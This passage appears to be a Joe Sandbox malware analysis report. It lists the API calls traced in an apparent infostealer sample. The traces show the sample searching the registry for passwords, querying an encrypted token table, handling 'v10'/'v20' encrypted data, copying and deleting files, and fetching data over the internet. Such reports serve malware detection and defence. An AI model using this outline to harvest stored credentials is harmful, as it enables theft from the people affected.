                                      • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                      • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                      • HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                        • Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B
                                      • task.LIBCPMTD ref: 00407555
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                      • String ID: Password
                                      • API String ID: 2698061284-3434357891
                                      • Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                      • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                                      • Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                      • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5
                                      APIs
                                      • lstrcatA.KERNEL32(?,006C09C8,?,00000104,?,00000104,?,00000104,?,00000104), ref: 004147DB
                                        • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                      • lstrcatA.KERNEL32(?,00000000), ref: 00414801
                                      • lstrcatA.KERNEL32(?,?), ref: 00414820
                                      • lstrcatA.KERNEL32(?,?), ref: 00414834
                                      • lstrcatA.KERNEL32(?,0068A5A8), ref: 00414847
                                      • lstrcatA.KERNEL32(?,?), ref: 0041485B
                                      • lstrcatA.KERNEL32(?,006C0280), ref: 0041486F
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                        • Part of subcall function 00414570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                        • Part of subcall function 00414570: HeapAlloc.KERNEL32(00000000), ref: 00414587
                                        • Part of subcall function 00414570: wsprintfA.USER32 ref: 004145A6
                                        • Part of subcall function 00414570: FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                      • String ID: 0aA
                                      • API String ID: 167551676-2786531170
                                      • Opcode ID: 385f363be4903eac86b7405a7b11766b7307db1bed5a32dad561bb07a2df71f9
                                      • Instruction ID: 67fb29d5a8d89bc8d31ec604eacddc75011aa0e27ff4711df2ee94280de74797
                                      • Opcode Fuzzy Hash: 385f363be4903eac86b7405a7b11766b7307db1bed5a32dad561bb07a2df71f9
                                      • Instruction Fuzzy Hash: EF3182BAD402086BDB10FBF0DC85EE9737DAB48704F40458EB31996081EE7897C9CB99
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,006BF690,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,006BF690,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
                                      • __aulldiv.LIBCMT ref: 00418172
                                      • __aulldiv.LIBCMT ref: 00418180
                                      • wsprintfA.USER32 ref: 004181AC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                      • String ID: %d MB$@
                                      • API String ID: 2886426298-3474575989
                                      • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                      • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                                      • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                      • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                                      APIs
                                      • memset.MSVCRT ref: 022E4FEE
                                        • Part of subcall function 022E9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022E9072
                                      • lstrcat.KERNEL32(?,00000000), ref: 022E5017
                                      • lstrcat.KERNEL32(?,00421000), ref: 022E5034
                                        • Part of subcall function 022E4B77: wsprintfA.USER32 ref: 022E4B93
                                        • Part of subcall function 022E4B77: FindFirstFileA.KERNEL32(?,?), ref: 022E4BAA
                                      • memset.MSVCRT ref: 022E507A
                                      • lstrcat.KERNEL32(?,00000000), ref: 022E50A3
                                      • lstrcat.KERNEL32(?,00421020), ref: 022E50C0
                                        • Part of subcall function 022E4B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 022E4BD8
                                        • Part of subcall function 022E4B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 022E4BEE
                                        • Part of subcall function 022E4B77: FindNextFileA.KERNEL32(000000FF,?), ref: 022E4DE4
                                        • Part of subcall function 022E4B77: FindClose.KERNEL32(000000FF), ref: 022E4DF9
                                      • memset.MSVCRT ref: 022E5106
                                      • lstrcat.KERNEL32(?,00000000), ref: 022E512F
                                      • lstrcat.KERNEL32(?,00421038), ref: 022E514C
                                        • Part of subcall function 022E4B77: wsprintfA.USER32 ref: 022E4C17
                                        • Part of subcall function 022E4B77: StrCmpCA.SHLWAPI(?,004208D2), ref: 022E4C2C
                                        • Part of subcall function 022E4B77: wsprintfA.USER32 ref: 022E4C49
                                        • Part of subcall function 022E4B77: PathMatchSpecA.SHLWAPI(?,?), ref: 022E4C85
                                        • Part of subcall function 022E4B77: lstrcat.KERNEL32(?,0064A524), ref: 022E4CB1
                                        • Part of subcall function 022E4B77: lstrcat.KERNEL32(?,00420FF8), ref: 022E4CC3
                                        • Part of subcall function 022E4B77: lstrcat.KERNEL32(?,?), ref: 022E4CD7
                                        • Part of subcall function 022E4B77: lstrcat.KERNEL32(?,00420FFC), ref: 022E4CE9
                                        • Part of subcall function 022E4B77: lstrcat.KERNEL32(?,?), ref: 022E4CFD
                                        • Part of subcall function 022E4B77: CopyFileA.KERNEL32(?,?,00000001), ref: 022E4D13
                                        • Part of subcall function 022E4B77: DeleteFileA.KERNEL32(?), ref: 022E4D98
                                      • memset.MSVCRT ref: 022E5192
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                      • String ID:
                                      • API String ID: 4017274736-0
                                      • Opcode ID: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                      • Instruction ID: db05b167b2f9cd16b0adcd5423be81d2d0db33ff3aefd49a6bcb9afd82be81d1
                                      • Opcode Fuzzy Hash: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                      • Instruction Fuzzy Hash: 4741D679A5031467DB10F7F0EC46FED3739AB24701F804494B68A660C4EEB897D88F92
                                      APIs
                                      • memset.MSVCRT ref: 004140D5
                                      • RegOpenKeyExA.ADVAPI32(80000001,006C0200,00000000,00020119,?), ref: 004140F4
                                      • RegQueryValueExA.ADVAPI32(?,006C0B30,00000000,00000000,00000000,000000FF), ref: 00414118
                                      • RegCloseKey.ADVAPI32(?), ref: 00414122
                                      • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414147
                                      • lstrcatA.KERNEL32(?,006C09E0), ref: 0041415B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$CloseOpenQueryValuememset
                                      • String ID: l
                                      • API String ID: 2623679115-1912013478
                                      • Opcode ID: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                      • Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
                                      • Opcode Fuzzy Hash: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                      • Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92
                                      APIs
                                      • memset.MSVCRT ref: 022E433C
                                      • RegOpenKeyExA.ADVAPI32(80000001,0064A4D8,00000000,00020119,?), ref: 022E435B
                                      • RegQueryValueExA.ADVAPI32(?,0064A0D4,00000000,00000000,00000000,000000FF), ref: 022E437F
                                      • RegCloseKey.ADVAPI32(?), ref: 022E4389
                                      • lstrcat.KERNEL32(?,00000000), ref: 022E43AE
                                      • lstrcat.KERNEL32(?,l), ref: 022E43C2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$CloseOpenQueryValuememset
                                      • String ID: l
                                      • API String ID: 2623679115-1912013478
                                      • Opcode ID: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                      • Instruction ID: 774d50453fc92d8a0cf0f41e48c519431a2f8cf08798a2021fe9358087ec2b5a
                                      • Opcode Fuzzy Hash: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                      • Instruction Fuzzy Hash: F641C4B6950208BBDF14FBE0DC45FEE333AAB49300F40455CA61A571D4EA759698CFE2
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0064A360,00000000,?,00420E2C,00000000,?,00000000), ref: 022E8397
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 022E839E
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 022E83BF
                                      • __aulldiv.LIBCMT ref: 022E83D9
                                      • __aulldiv.LIBCMT ref: 022E83E7
                                      • wsprintfA.USER32 ref: 022E8413
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                      • String ID: @
                                      • API String ID: 2774356765-2766056989
                                      • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                      • Instruction ID: 2b9d2c89cc79d323a96f5a89d2ba8a7fd6ae12c1c4badfe6e585ced312a11b55
                                      • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                      • Instruction Fuzzy Hash: 29214AB1E54218ABDB00DFD4DC49FAEB7B9FB44B04F504609F616BB284C7B869008BA5
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                      • lstrlenA.KERNEL32(00000000), ref: 0040BC9F
                                        • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
                                      • lstrlenA.KERNEL32(00000000), ref: 0040BDA5
                                      • lstrlenA.KERNEL32(00000000), ref: 0040BDB9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                      • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                      • API String ID: 1440504306-1079375795
                                      • Opcode ID: b74f765d32784b8827112e529741beea93106054c3ae35f717795dfd1135bcd2
                                      • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                                      • Opcode Fuzzy Hash: b74f765d32784b8827112e529741beea93106054c3ae35f717795dfd1135bcd2
                                      • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess$DefaultLangUser
                                      • String ID: B
                                      • API String ID: 1494266314-2248957098
                                      • Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                      • Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
                                      • Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                      • Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96
                                      APIs
                                      • memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
                                        • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                        • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                        • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                        • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
                                      • memset.MSVCRT ref: 00409EE8
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00409F41
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                      • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                      • API String ID: 1977917189-1096346117
                                      • Opcode ID: 9c666873091c2eb9f79dea775311e52b8b7ab5e3d76554732510085addbe92b4
                                      • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
                                      • Opcode Fuzzy Hash: 9c666873091c2eb9f79dea775311e52b8b7ab5e3d76554732510085addbe92b4
                                      • Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
                                      APIs
                                        • Part of subcall function 022D7537: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 022D75A1
                                        • Part of subcall function 022D7537: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 022D7618
                                        • Part of subcall function 022D7537: StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 022D7674
                                        • Part of subcall function 022D7537: GetProcessHeap.KERNEL32(00000000,?), ref: 022D76B9
                                        • Part of subcall function 022D7537: HeapFree.KERNEL32(00000000), ref: 022D76C0
                                      • lstrcat.KERNEL32(0064A668,004217FC), ref: 022D786D
                                      • lstrcat.KERNEL32(0064A668,00000000), ref: 022D78AF
                                      • lstrcat.KERNEL32(0064A668,00421800), ref: 022D78C1
                                      • lstrcat.KERNEL32(0064A668,00000000), ref: 022D78F6
                                      • lstrcat.KERNEL32(0064A668,00421804), ref: 022D7907
                                      • lstrcat.KERNEL32(0064A668,00000000), ref: 022D793A
                                      • lstrcat.KERNEL32(0064A668,00421808), ref: 022D7954
                                      • task.LIBCPMTD ref: 022D7962
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                      • String ID:
                                      • API String ID: 2677904052-0
                                      • Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                      • Instruction ID: cf4a7821771cdac8e22ca8d66d6d36e0a275f20a70a445ebae946f91aeec6ae1
                                      • Opcode Fuzzy Hash: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                      • Instruction Fuzzy Hash: 3F314FB6A50209EFCB04EBE0DC94DFE7776EB49301F105018E106A7294DA34E942CF52
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
                                      • HeapAlloc.KERNEL32(00000000), ref: 00404FD1
                                      • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
                                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
                                      • InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
                                      • memcpy.MSVCRT(00000000,?,00000001), ref: 0040508A
                                      • InternetCloseHandle.WININET(00415EDB), ref: 004050B9
                                      • InternetCloseHandle.WININET(?), ref: 004050C6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                                      • String ID:
                                      • API String ID: 3894370878-0
                                      • Opcode ID: c5b41fa6e165f4f6bec00693b56505ba52b2ff2e1245794bd4b205df82c6c57d
                                      • Instruction ID: cb0899809939a0b3ab7ef321ba077ef70f04c27eec1e373fde9f1e9505320bf0
                                      • Opcode Fuzzy Hash: c5b41fa6e165f4f6bec00693b56505ba52b2ff2e1245794bd4b205df82c6c57d
                                      • Instruction Fuzzy Hash: 2A3108B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081E9F709B7281C7746AC58F99
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 022D5231
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 022D5238
                                      • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 022D5251
                                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 022D5278
                                      • InternetReadFile.WININET(?,?,00000400,00000000), ref: 022D52A8
                                      • memcpy.MSVCRT(00000000,?,00000001), ref: 022D52F1
                                      • InternetCloseHandle.WININET(?), ref: 022D5320
                                      • InternetCloseHandle.WININET(?), ref: 022D532D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                      • String ID:
                                      • API String ID: 1008454911-0
                                      • Opcode ID: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                      • Instruction ID: ee2c64580d4dec94019297141c0432774384836935dac6d87814800b00e75967
                                      • Opcode Fuzzy Hash: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                      • Instruction Fuzzy Hash: 0A31F9B4A40218ABDB20CF94DC89BDCB7B5EB48704F5081D9F609A7284D7B46AC5CF59
                                      APIs
                                      • memset.MSVCRT ref: 022D158E
                                        • Part of subcall function 022D1507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 022D151B
                                        • Part of subcall function 022D1507: RtlAllocateHeap.NTDLL(00000000), ref: 022D1522
                                        • Part of subcall function 022D1507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 022D153E
                                        • Part of subcall function 022D1507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 022D155C
                                        • Part of subcall function 022D1507: RegCloseKey.ADVAPI32(?), ref: 022D1566
                                      • lstrcat.KERNEL32(?,00000000), ref: 022D15B6
                                      • lstrlen.KERNEL32(?), ref: 022D15C3
                                      • lstrcat.KERNEL32(?,004262EC), ref: 022D15DE
                                        • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                        • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                        • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                        • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                        • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                        • Part of subcall function 022E8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022D1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022E8DED
                                        • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                        • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 022D16CC
                                        • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                        • Part of subcall function 022D9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022D9C53
                                        • Part of subcall function 022D9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 022D9C78
                                        • Part of subcall function 022D9C27: LocalAlloc.KERNEL32(00000040,?), ref: 022D9C98
                                        • Part of subcall function 022D9C27: ReadFile.KERNEL32(000000FF,?,00000000,022D16F6,00000000), ref: 022D9CC1
                                        • Part of subcall function 022D9C27: LocalFree.KERNEL32(022D16F6), ref: 022D9CF7
                                        • Part of subcall function 022D9C27: CloseHandle.KERNEL32(000000FF), ref: 022D9D01
                                      • DeleteFileA.KERNEL32(00000000), ref: 022D1756
                                      • memset.MSVCRT ref: 022D177D
                                      Memory Dump Source
